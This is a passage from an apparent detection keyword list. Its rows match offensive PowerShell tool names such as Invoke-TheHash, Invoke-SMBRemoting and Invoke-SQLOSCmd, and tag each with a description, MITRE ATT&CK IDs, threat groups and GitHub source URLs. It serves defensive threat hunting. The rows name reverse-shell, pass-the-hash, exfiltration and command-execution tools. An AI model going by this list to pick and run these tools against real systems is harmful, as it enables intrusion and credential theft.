- T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-SMBNegotiate -ComputerName localhost*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SMBNegotiate*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SmbObey *,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,0,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*Invoke-SmbObey.*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,1,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*Invoke-SmbOrder *,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,0,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*Invoke-SmbOrder.*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,1,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*Invoke-SMBRemoting.ps1*,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,1,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*Invoke-SMBRemoting-main*,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,1,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*Invoke-SMBScanner*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SmbScanner.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SmbScanner*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SmbScanner.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SmbScanner*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1080,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Snaffler*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Snaffler*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*invoke-sniffer *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-SocksProxy *,offensive_tool_keyword,Invoke-SocksProxy,Socks proxy - and reverse socks server using powershell.,T1090 - T1021.001 - T1021.002,TA0002,N/A,N/A,C2,https://github.com/p3nt4/Invoke-SocksProxy,1,0,N/A,10,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z -*Invoke-SocksProxy*,offensive_tool_keyword,Invoke-SocksProxy,Creates a local or reverse Socks proxy using powershell,T1090 - T1573 - T1059 - T1021,TA0002 - TA0011 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/p3nt4/Invoke-SocksProxy,1,0,N/A,N/A,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z -*Invoke-SocksProxy.*,offensive_tool_keyword,Invoke-SocksProxy,Socks proxy - and reverse socks server using powershell.,T1090 - T1021.001 - T1021.002,TA0002,N/A,N/A,C2,https://github.com/p3nt4/Invoke-SocksProxy,1,1,N/A,10,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z -*Invoke-Spoolsample*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SpoolSample*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SprayEmptyPassword*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SQLAudit*,offensive_tool_keyword,AD exploitation cheat sheet,Scan for MSSQL misconfigurations to escalate to System Admin,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-SQLAudit*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SQLDumpInfo*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SQLOSCmd -Instance * -Command *,offensive_tool_keyword,AD exploitation cheat sheet,Run command (enables XP_CMDSHELL automatically if required),T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Invoke-SQLOSCmd.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SQLOSCmd.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SQLOSCmd.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1096,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SQLUncPathInjection*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SSHCommand.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-SSIDExfil*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-StandIn.*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*invokestealthuserhunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-StealthUserHunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-StickyNotesExtract*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SystemStartupCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-SystemStartupHistoryCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SystemStartupHistoryCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Tater.*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-Tater.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Tater.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-TcpEndpointsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-TheHash*,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,0,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -*Invoke-TheHash.ps1*,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,1,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -*Invoke-TheHash.psd1*,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral movement,https://github.com/Kevin-Robertson/Invoke-TheHash,1,1,N/A,10,10,1345,308,2018-12-09T15:38:36Z,2017-01-03T01:05:39Z -*Invoke-TheHash.psm1*,offensive_tool_keyword,Invoke-TheHash,Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.,T1028 - T1047 - T1075 - T1078,TA0003 - TA0004 - TA0006,N/A,N/A,Lateral 